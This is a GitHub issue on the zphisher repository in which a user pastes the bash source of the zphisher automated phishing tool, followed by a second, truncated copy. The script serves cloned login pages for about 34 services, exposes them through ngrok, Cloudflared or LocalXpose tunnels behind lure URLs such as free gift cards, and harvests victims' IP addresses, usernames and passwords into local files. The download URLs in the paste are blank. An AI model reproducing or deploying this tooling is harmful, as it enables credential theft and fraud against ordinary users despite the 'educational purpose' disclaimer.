htr-tech / zphisher

An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! Author will not be responsible for any misuse of this toolkit !
GNU General Public License v3.0
11.12k stars 3.69k forks source link

zphisher #598

Closed Ketns213 closed 1 year ago

Ketns213 commented 2 years ago


   Zphisher         :         Automated Phishing Tool

   Author         :         TAHMID RAYAT 

   Version         :         2.3.1

   Github         :


                    Version 3, 29 June 2007

    Copyright (C) 2007 Free Software Foundation, Inc.

    Everyone is permitted to copy and distribute verbatim copies

    of this license document, but changing it is not allowed.


    The GNU General Public License is a free, copyleft license for

    software and other kinds of works.

    The licenses for most software and other practical works are designed

    to take away your freedom to share and change the works.  By contrast,

    the GNU General Public License is intended to guarantee your freedom to

    share and change all versions of a program--to make sure it remains free

    software for all its users.  We, the Free Software Foundation, use the

    GNU General Public License for most of our software; it applies also to

    any other work released this way by its authors.  You can apply it to

    your programs, too.

    When we speak of free software, we are referring to freedom, not

    price.  Our General Public Licenses are designed to make sure that you

    have the freedom to distribute copies of free software (and charge for

    them if you wish), that you receive source code or can get it if you

    want it, that you can change the software or use pieces of it in new

    free programs, and that you know you can do these things.

    To protect your rights, we need to prevent others from denying you

    these rights or asking you to surrender the rights.  Therefore, you have

    certain responsibilities if you distribute copies of the software, or if

    you modify it: responsibilities to respect the freedom of others.

    For example, if you distribute copies of such a program, whether

    gratis or for a fee, you must pass on to the recipients the same

    freedoms that you received.  You must make sure that they, too, receive

    or can get the source code.  And you must show them these terms so they

    know their rights.

    Developers that use the GNU GPL protect your rights with two steps:

    (1) assert copyright on the software, and (2) offer you this License

    giving you legal permission to copy, distribute and/or modify it.

    For the developers' and authors' protection, the GPL clearly explains

    that there is no warranty for this free software.  For both users' and

    authors' sake, the GPL requires that modified versions be marked as

    changed, so that their problems will not be attributed erroneously to

    authors of previous versions.

    Some devices are designed to deny users access to install or run

    modified versions of the software inside them, although the manufacturer

    can do so.  This is fundamentally incompatible with the aim of

    protecting users' freedom to change the software.  The systematic

    pattern of such abuse occurs in the area of products for individuals to

    use, which is precisely where it is most unacceptable.  Therefore, we

    have designed this version of the GPL to prohibit the practice for those

    products.  If such problems arise substantially in other domains, we

    stand ready to extend this provision to those domains in future versions

    of the GPL, as needed to protect the freedom of users.

    Finally, every program is threatened constantly by software patents.

    States should not allow patents to restrict development and use of

    software on general-purpose computers, but in those that do, we wish to

    avoid the special danger that patents applied to a free program could

    make it effectively proprietary.  To prevent this, the GPL assures that

    patents cannot be used to render the program non-free.

    The precise terms and conditions for copying, distribution and

    modification follow.

      Copyright (C) 2022  HTR-TECH (


   1RaY-1 -

   Aditya Shakya -

   Ali Milani Amin -

   Ignitetch  -

   Moises Tapia -

   Mustakim Ahmed -

   TheLinuxChoice -


 ANSI colors (FG & BG)

RED="$(printf '\033[31m')"  GREEN="$(printf '\033[32m')"  ORANGE="$(printf '\033[33m')"  BLUE="$(printf '\033[34m')" MAGENTA="$(printf '\033[35m')"  CYAN="$(printf '\033[36m')"  WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')" REDBG="$(printf '\033[41m')"  GREENBG="$(printf '\033[42m')"  ORANGEBG="$(printf '\033[43m')"  BLUEBG="$(printf '\033[44m')" MAGENTABG="$(printf '\033[45m')"  CYANBG="$(printf '\033[46m')"  WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')" RESETBG="$(printf '\e[0m\n')"


if [[ ! -d ".server" ]]; then         mkdir -p ".server" fi

if [[ ! -d "auth" ]]; then         mkdir -p "auth" fi

if [[ -d ".server/www" ]]; then         rm -rf ".server/www"         mkdir -p ".server/www" else         mkdir -p ".server/www" fi

 Remove logfile

if [[ -e ".server/.loclx" ]]; then         rm -rf ".server/.loclx" fi

if [[ -e ".server/.cld.log" ]]; then         rm -rf ".server/.cld.log" fi

 Script termination

exit_on_signal_SIGINT() {         { printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Interrupted." 2>&1; reset_color; }         exit 0 }

exit_on_signal_SIGTERM() {         { printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Terminated." 2>&1; reset_color; }         exit 0 }

trap exit_on_signal_SIGINT SIGINT trap exit_on_signal_SIGTERM SIGTERM

 Reset terminal colors

reset_color() {         tput sgr0   # reset attributes         tput op     # reset color         return }

 Kill already running process

kill_pid() {         check_PID="php ngrok cloudflared loclx"         for process in ${check_PID}; do                 if [[ $(pidof ${process}) ]]; then # Check for Process                         killall ${process} > /dev/null 2>&1 # Kill the Process                 fi         done }


banner() {         cat <<- EOF                 ${ORANGE}                 ${ORANGE} __                _                                ${ORANGE}|  /     | |   ()   | |                               ${ORANGE}   / /   | |   | |    _                   ${ORANGE}  / / | ' | ' | / | ' \ /  \ '|                 ${ORANGE} / /| |) | | | | _ \ | | |  / |                    ${ORANGE}/___| ./|| ||_|__/| ||\||                    ${ORANGE}      | |                                                 ${ORANGE}      ||                ${RED}Version : ${version}

                ${GREEN}[${WHITE}-${GREEN}]${CYAN} Tool Created by htr-tech (tahmid.rayat)${WHITE}         EOF }

 Small Banner

banner_small() {         cat <<- EOF                 ${BLUE}                 ${BLUE}  ░▀▀█░█▀█░█░█░▀█▀░█▀▀░█░█░█▀▀░█▀▄                 ${BLUE}  ░▄▀░░█▀▀░█▀█░░█░░▀▀█░█▀█░█▀▀░█▀▄                 ${BLUE}  ░▀▀▀░▀░░░▀░▀░▀▀▀░▀▀▀░▀░▀░▀▀▀░▀░▀${WHITE} ${version}         EOF }


dependencies() {         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing required packages..."

        if [[ -d "/data/data/com.termux/files/home" ]]; then                 if [[ ! $(command -v proot) ]]; then                         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}proot${CYAN}"${WHITE}                         pkg install proot resolv-conf -y                 fi

                if [[ ! $(command -v tput) ]]; then                         echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}ncurses-utils${CYAN}"${WHITE}                         pkg install ncurses-utils -y                 fi         fi

        if [[ $(command -v php) && $(command -v curl) && $(command -v unzip) ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Packages already installed."         else                 pkgs=(php curl unzip)                 for pkg in "${pkgs[@]}"; do                         type -p "$pkg" &>/dev/null || {                                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}$pkg${CYAN}"${WHITE}                                 if [[ $(command -v pkg) ]]; then                                         pkg install "$pkg" -y                                 elif [[ $(command -v apt) ]]; then                                         sudo apt install "$pkg" -y                                 elif [[ $(command -v apt-get) ]]; then                                         sudo apt-get install "$pkg" -y                                 elif [[ $(command -v pacman) ]]; then                                         sudo pacman -S "$pkg" --noconfirm                                 elif [[ $(command -v dnf) ]]; then                                         sudo dnf -y install "$pkg"                                 elif [[ $(command -v yum) ]]; then                                         sudo yum -y install "$pkg"                                 else                                         echo -e "\n${RED}[${WHITE}!${RED}]${RED} Unsupported package manager, Install packages manually."                                         { reset_color; exit 1; }                                 fi                         }                 done         fi }

 Download Binaries

download() {         url="$1"         output="$2"         file=basename $url         if [[ -e "$file" || -e "$output" ]]; then                 rm -rf "$file" "$output"         fi         curl --silent --insecure --fail --retry-connrefused \                 --retry 3 --retry-delay 2 --location --output "${file}" "${url}"

        if [[ -e "$file" ]]; then                 if [[ ${file#.} == "zip" ]]; then                         unzip -qq $file > /dev/null 2>&1                         mv -f $output .server/$output > /dev/null 2>&1                 elif [[ ${file#.} == "tgz" ]]; then                         tar -zxf $file > /dev/null 2>&1                         mv -f $output .server/$output > /dev/null 2>&1                 else                         mv -f $file .server/$output > /dev/null 2>&1                 fi                 chmod +x .server/$output > /dev/null 2>&1                 rm -rf "$file"         else                 echo -e "\n${RED}[${WHITE}!${RED}]${RED} Error occured while downloading ${output}."                 { reset_color; exit 1; }         fi }

 Install ngrok

install_ngrok() {         if [[ -e ".server/ngrok" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Ngrok already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing ngrok..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'ngrok'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'ngrok'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'ngrok'                 else                         download '' 'ngrok'                 fi         fi }

 Install Cloudflared

install_cloudflared() {         if [[ -e ".server/cloudflared" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Cloudflared already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing Cloudflared..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'cloudflared'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'cloudflared'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'cloudflared'                 else                         download '' 'cloudflared'                 fi         fi }

 Install LocalXpose

install_localxpose() {         if [[ -e ".server/loclx" ]]; then                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} LocalXpose already installed."         else                 echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing LocalXpose..."${WHITE}                 arch=uname -m                 if [[ ("$arch" == 'arm') || ("$arch" == 'Android') ]]; then                         download '' 'loclx'                 elif [[ "$arch" == 'aarch64' ]]; then                         download '' 'loclx'                 elif [[ "$arch" == 'x86_64' ]]; then                         download '' 'loclx'                 else                         download '' 'loclx'                 fi         fi }

 Exit message

msg_exit() {         { clear; banner; echo; }         echo -e "${GREENBG}${BLACK} Thank you for using this tool. Have a good day.${RESETBG}\n"         { reset_color; exit 0; } }


about() {         { clear; banner; echo; }         cat <<- EOF                 ${GREEN} Author   ${RED}:  ${ORANGE}TAHMID RAYAT ${RED}[ ${ORANGE}HTR-TECH ${RED}]                 ${GREEN} Github   ${RED}:  ${CYAN}                 ${GREEN} Social   ${RED}:  ${CYAN}                 ${GREEN} Version  ${RED}:  ${ORANGE}${version}

                ${WHITE} ${REDBG}Warning:${RESETBG}                 ${CYAN}  This Tool is made for educational purpose                    only ${RED}!${WHITE}${CYAN} Author will not be responsible for                    any misuse of this toolkit ${RED}!${WHITE}                                  ${WHITE} ${CYANBG}Special Thanks to:${RESETBG}                 ${GREEN}  1RaY-1, Adi1090x, AliMilani, BDhackers009,                   KasRoudra, sepp0, ThelinuxChoice, Yisus7u7

                ${RED}[${WHITE}00${RED}]${ORANGE} Main Menu     ${RED}[${WHITE}99${RED}]${ORANGE} Exit


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"         case $REPLY in                  99)                         msg_exit;;                 0 | 00)                         echo -ne "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Returning to main menu..."                         { sleep 1; main_menu; };;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; about; };;         esac }

 Setup website and start php server

HOST='' PORT='8080'

setup_site() {         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Setting up server..."${WHITE}         cp -rf .sites/"$website"/* .server/www         cp -f .sites/ip.php .server/www/         echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Starting PHP server..."${WHITE}         cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 &  }

 Get IP address

capture_ip() {         IP=$(grep -a 'IP:' .server/www/ip.txt | cut -d " " -f2 | tr -d '\r')         IFS=$'\n'         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Victim's IP : ${BLUE}$IP"         echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}auth/ip.txt"         cat .server/www/ip.txt >> auth/ip.txt }

 Get credentials

capture_creds() {         ACCOUNT=$(grep -o 'Username:.' .server/www/usernames.txt | awk '{print $2}')         PASSWORD=$(grep -o 'Pass:.' .server/www/usernames.txt | awk -F ":." '{print $NF}')         IFS=$'\n'         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}auth/usernames.dat"         cat .server/www/usernames.txt >> auth/usernames.dat         echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. " }

 Print data

capture_data() {         echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit..."         while true; do                 if [[ -e ".server/www/ip.txt" ]]; then                         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Victim IP Found !"                         capture_ip                         rm -rf .server/www/ip.txt                 fi                 sleep 0.75                 if [[ -e ".server/www/usernames.txt" ]]; then                         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Login info Found !!"                         capture_creds                         rm -rf .server/www/usernames.txt                 fi                 sleep 0.75         done }

 Start ngrok

start_ngrok() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; }         echo -e "\n"         read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Ngrok Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion         [[ ${opinion,,} == "y" ]] && ngrok_region="eu" || ngrok_region="us"         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Ngrok..."

        if [[ command -v termux-chroot ]]; then                 sleep 2 && termux-chroot ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 &         else                 sleep 2 && ./.server/ngrok http --region ${ngrok_region} "$HOST":"$PORT" --log=stdout > /dev/null 2>&1 &         fi

        { sleep 8; clear; banner_small; }         ngrok_url=$(curl -s -N | grep -Eo '(https)://[^/"]+(')         ngrok_url1=${ngrok_url#https://}         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$ngrok_url"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$ngrok_url1"         capture_data }

 Start Cloudflared

start_cloudflared() {      rm .cld.log > /dev/null 2>&1 &         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; }         echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Cloudflared..."

        if [[ command -v termux-chroot ]]; then                 sleep 2 && termux-chroot ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &         else                 sleep 2 && ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .server/.cld.log > /dev/null 2>&1 &         fi

        { sleep 8; clear; banner_small; }                  cldflr_link=$(grep -o 'https://[-0-9a-z]*\' ".server/.cld.log")         cldflr_link1=${cldflr_link#https://}         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$cldflr_link"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$cldflr_link1"         capture_data }

localxpose_auth() {         ./.server/loclx -help > /dev/null 2>&1 &         sleep 1         [ -d ".localxpose" ] && auth_f=".localxpose/.access" || auth_f="$HOME/.localxpose/.access" 

        [ "$(./.server/loclx account status | grep Error)" ] && {                 echo -e "\n\n${RED}[${WHITE}!${RED}]${GREEN} Create an account on ${ORANGE}${GREEN} & copy the token\n"                 sleep 3                 read -p "${RED}[${WHITE}-${RED}]${ORANGE} Input Loclx Token :${ORANGE} " loclx_token                 [[ $loclx_token == "" ]] && {                         echo -e "\n${RED}[${WHITE}!${RED}]${RED} You have to input Localxpose Token." ; sleep 2 ; tunnel_menu                 } || {                         echo -n "$loclx_token" > $auth_f 2> /dev/null                 }         } }

 Start LocalXpose (Again...)

start_loclx() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         { sleep 1; setup_site; localxpose_auth; }         echo -e "\n"         read -n1 -p "${RED}[${WHITE}-${RED}]${ORANGE} Change Loclx Server Region? ${GREEN}[${CYAN}y${GREEN}/${CYAN}N${GREEN}]:${ORANGE} " opinion         [[ ${opinion,,} == "y" ]] && loclx_region="eu" || loclx_region="us"         echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching LocalXpose..."

        if [[ command -v termux-chroot ]]; then                 sleep 1 && termux-chroot ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &         else                 sleep 1 && ./.server/loclx tunnel --raw-mode http --region ${loclx_region} --https-redirect -t "$HOST":"$PORT" > .server/.loclx 2>&1 &         fi

        { sleep 12; clear; banner_small; }         loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-Z.]*') #DONE :)         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}http://$loclx_url"         echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$loclx_url"         capture_data }

 Start localhost

start_localhost() {         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"         setup_site         { sleep 1; clear; banner_small; }         echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Successfully Hosted at : ${GREEN}${CYAN}http://$HOST:$PORT ${GREEN}"         capture_data }

 Tunnel selection

tunnel_menu() {         { clear; banner_small; }         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Localhost                 ${RED}[${WHITE}02${RED}]${ORANGE}     ${RED}[${CYAN}Account Needed${RED}]                 ${RED}[${WHITE}03${RED}]${ORANGE} Cloudflared  ${RED}[${CYAN}Auto Detects${RED}]                 ${RED}[${WHITE}04${RED}]${ORANGE} LocalXpose   ${RED}[${CYAN}NEW! Max 15Min${RED}]


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select a port forwarding service : ${BLUE}"

        case $REPLY in                  1 | 01)                         start_localhost;;                 2 | 02)                         start_ngrok;;                 3 | 03)                         start_cloudflared;;                 4 | 04)                         start_loclx;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; tunnel_menu; };;         esac }


site_facebook() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} Fake Security Login Page                 ${RED}[${WHITE}04${RED}]${ORANGE} Facebook Messenger Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="facebook"                         mask='http://blue-verified-badge-for-facebook-free'                         tunnel_menu;;                 2 | 02)                         website="fb_advanced"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 3 | 03)                         website="fb_security"                         mask='http://make-your-facebook-secured-and-free-from-hackers'                         tunnel_menu;;                 4 | 04)                         website="fb_messenger"                         mask='http://get-messenger-premium-features-free'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_facebook; };;         esac }


site_instagram() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Auto Followers Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} 1000 Followers Login Page                 ${RED}[${WHITE}04${RED}]${ORANGE} Blue Badge Verify Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="instagram"                         mask='http://get-unlimited-followers-for-instagram'                         tunnel_menu;;                 2 | 02)                         website="ig_followers"                         mask='http://get-unlimited-followers-for-instagram'                         tunnel_menu;;                 3 | 03)                         website="insta_followers"                         mask='http://get-1000-followers-for-instagram'                         tunnel_menu;;                 4 | 04)                         website="ig_verify"                         mask='http://blue-badge-verify-for-instagram-free'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_instagram; };;         esac }


site_gmail() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Gmail Old Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Gmail New Login Page                 ${RED}[${WHITE}03${RED}]${ORANGE} Advanced Voting Poll


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="google"                         mask='http://get-unlimited-google-drive-free'                         tunnel_menu;;                                 2 | 02)                         website="google_new"                         mask='http://get-unlimited-google-drive-free'                         tunnel_menu;;                 3 | 03)                         website="google_poll"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_gmail; };;         esac }


site_vk() {         cat <<- EOF

                ${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page                 ${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page


        read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         website="vk"                         mask='http://vk-premium-real-method-2020'                         tunnel_menu;;                 2 | 02)                         website="vk_poll"                         mask='http://vote-for-the-best-social-media'                         tunnel_menu;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; clear; banner_small; site_vk; };;         esac }


main_menu() {         { clear; banner; echo; }         cat <<- EOF                 ${RED}[${WHITE}::${RED}]${ORANGE} Select An Attack For Your Victim ${RED}[${WHITE}::${RED}]${ORANGE}

                ${RED}[${WHITE}01${RED}]${ORANGE} Facebook      ${RED}[${WHITE}11${RED}]${ORANGE} Twitch       ${RED}[${WHITE}21${RED}]${ORANGE} DeviantArt                 ${RED}[${WHITE}02${RED}]${ORANGE} Instagram     ${RED}[${WHITE}12${RED}]${ORANGE} Pinterest    ${RED}[${WHITE}22${RED}]${ORANGE} Badoo                 ${RED}[${WHITE}03${RED}]${ORANGE} Google        ${RED}[${WHITE}13${RED}]${ORANGE} Snapchat     ${RED}[${WHITE}23${RED}]${ORANGE} Origin                 ${RED}[${WHITE}04${RED}]${ORANGE} Microsoft     ${RED}[${WHITE}14${RED}]${ORANGE} Linkedin     ${RED}[${WHITE}24${RED}]${ORANGE} DropBox                         ${RED}[${WHITE}05${RED}]${ORANGE} Netflix       ${RED}[${WHITE}15${RED}]${ORANGE} Ebay         ${RED}[${WHITE}25${RED}]${ORANGE} Yahoo                                 ${RED}[${WHITE}06${RED}]${ORANGE} Paypal        ${RED}[${WHITE}16${RED}]${ORANGE} Quora        ${RED}[${WHITE}26${RED}]${ORANGE} Wordpress                 ${RED}[${WHITE}07${RED}]${ORANGE} Steam         ${RED}[${WHITE}17${RED}]${ORANGE} Protonmail   ${RED}[${WHITE}27${RED}]${ORANGE} Yandex                                         ${RED}[${WHITE}08${RED}]${ORANGE} Twitter       ${RED}[${WHITE}18${RED}]${ORANGE} Spotify      ${RED}[${WHITE}28${RED}]${ORANGE} StackoverFlow                 ${RED}[${WHITE}09${RED}]${ORANGE} Playstation   ${RED}[${WHITE}19${RED}]${ORANGE} Reddit       ${RED}[${WHITE}29${RED}]${ORANGE} Vk                 ${RED}[${WHITE}10${RED}]${ORANGE} Tiktok        ${RED}[${WHITE}20${RED}]${ORANGE} Adobe        ${RED}[${WHITE}30${RED}]${ORANGE} XBOX                 ${RED}[${WHITE}31${RED}]${ORANGE} Mediafire     ${RED}[${WHITE}32${RED}]${ORANGE} Gitlab       ${RED}[${WHITE}33${RED}]${ORANGE} Github                 ${RED}[${WHITE}34${RED}]${ORANGE} Discord

                ${RED}[${WHITE}99${RED}]${ORANGE} About         ${RED}[${WHITE}00${RED}]${ORANGE} Exit

        EOF                  read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"

        case $REPLY in                  1 | 01)                         site_facebook;;                 2 | 02)                         site_instagram;;                 3 | 03)                         site_gmail;;                 4 | 04)                         website="microsoft"                         mask='http://unlimited-onedrive-space-for-free'                         tunnel_menu;;                 5 | 05)                         website="netflix"                         mask='http://upgrade-your-netflix-plan-free'                         tunnel_menu;;                 6 | 06)                         website="paypal"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 7 | 07)                         website="steam"                         mask='http://steam-500-usd-gift-card-free'                         tunnel_menu;;                 8 | 08)                         website="twitter"                         mask='http://get-blue-badge-on-twitter-free'                         tunnel_menu;;                 9 | 09)                         website="playstation"                         mask='http://playstation-500-usd-gift-card-free'                         tunnel_menu;;                 10)                         website="tiktok"                         mask='http://tiktok-free-liker'                         tunnel_menu;;                 11)                         website="twitch"                         mask='http://unlimited-twitch-tv-user-for-free'                         tunnel_menu;;                 12)                         website="pinterest"                         mask='http://get-a-premium-plan-for-pinterest-free'                         tunnel_menu;;                 13)                         website="snapchat"                         mask='http://view-locked-snapchat-accounts-secretly'                         tunnel_menu;;                 14)                         website="linkedin"                         mask='http://get-a-premium-plan-for-linkedin-free'                         tunnel_menu;;                 15)                         website="ebay"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 16)                         website="quora"                         mask='http://quora-premium-for-free'                         tunnel_menu;;                 17)                         website="protonmail"                         mask='http://protonmail-pro-basics-for-free'                         tunnel_menu;;                 18)                         website="spotify"                         mask='http://convert-your-account-to-spotify-premium'                         tunnel_menu;;                 19)                         website="reddit"                         mask='http://reddit-official-verified-member-badge'                         tunnel_menu;;                 20)                         website="adobe"                         mask='http://get-adobe-lifetime-pro-membership-free'                         tunnel_menu;;                 21)                         website="deviantart"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 22)                         website="badoo"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 23)                         website="origin"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 24)                         website="dropbox"                         mask='http://get-1TB-cloud-storage-free'                         tunnel_menu;;                 25)                         website="yahoo"                         mask='http://grab-mail-from-anyother-yahoo-account-free'                         tunnel_menu;;                 26)                         website="wordpress"                         mask='http://unlimited-wordpress-traffic-free'                         tunnel_menu;;                 27)                         website="yandex"                         mask='http://grab-mail-from-anyother-yandex-account-free'                         tunnel_menu;;                 28)                         website="stackoverflow"                         mask='http://get-stackoverflow-lifetime-pro-membership-free'                         tunnel_menu;;                 29)                         site_vk;;                 30)                         website="xbox"                         mask='http://get-500-usd-free-to-your-acount'                         tunnel_menu;;                 31)                         website="mediafire"                         mask='http://get-1TB-on-mediafire-free'                         tunnel_menu;;                 32)                         website="gitlab"                         mask='http://get-1k-followers-on-gitlab-free'                         tunnel_menu;;                 33)                         website="github"                         mask='http://get-1k-followers-on-github-free'                         tunnel_menu;;                 34)                         website="discord"                         mask='http://get-discord-nitro-free'                         tunnel_menu;;                 99)                         about;;                 0 | 00 )                         msg_exit;;                 *)                         echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."                         { sleep 1; main_menu; };;                  esac }


kill_pid dependencies install_ngrok install_cloudflared install_localxpose main_menu

Ketns213 commented 2 years ago


   Zphisher         :         Automated Phishing Tool

   Author         :         TAHMID RAYAT 

   Version         :         2.3.1

   Github         :


                    Version 3, 29 June 2007

    Copyright (C) 2007 Free Software Foundation, Inc.

    Everyone is permitted to copy and distribute verbatim copies

    of this license document, but changing it is not allowed.


    The GNU General Public License is a free, copyleft license for

    software and other kinds of works.

    The licenses for most software and other practical works are designed

    to take away your freedom to share and change the works.  By contrast,

    the GNU General Public License is intended to guarantee your freedom to

    share and change all versions of a program--to make sure it remains free

    software for all its users.  We, the Free Software Foundation, use the

    GNU General Public License for most of our software; it applies also to

    any other work released this way by its authors.  You can apply it to

    your programs, too.

    When we speak of free software, we are referring to freedom, not

    price.  Our General Public Licenses are designed to make sure that you

    have the freedom to distribute copies of free software (and charge for

    them if you wish), that you receive source code or can get it if you

    want it, that you can change the software or use pieces of it in new

    free programs, and that you know you can do these things.

    To protect your rights, we need to prevent others from denying you

    these rights or asking you to surrender the rights.  Therefore, you have

    certain responsibilities if you distribute copies of the software, or if

    you modify it: responsibilities to respect the freedom of others.

    For example, if you distribute copies of such a program, whether

    gratis or for a fee, you must pass on to the recipients the same

    freedoms that you received.  You must make sure that they, too, receive

    or can get the source code.  And you must show them these terms so they

    know their rights.

    Developers that use the GNU GPL protect your rights with two steps:

    (1) assert copyright on the software, and (2) offer you this License

    giving you legal permission to copy, distribute and/or modify it.

    For the developers' and authors' protection, the GPL clearly explains

    that there is no warranty for this free software.  For both users' and

    authors' sake, the GPL requires that modified versions be marked as

    changed, so that their problems will not be attributed erroneously to

    authors of previous versions.

    Some devices are designed to deny users access to install or run

    modified versions of the software inside them, although the manufacturer

    can do so.  This is fundamentally incompatible with the aim of

    protecting users' freedom to change the software.  The systematic

    pattern of such abuse occurs in the area of products for individuals to

    use, which is precisely where it is most unacceptable.  Therefore, we

    have designed this version of the GPL to prohibit the practice for those

    products.  If such problems arise substantially in other domains, we

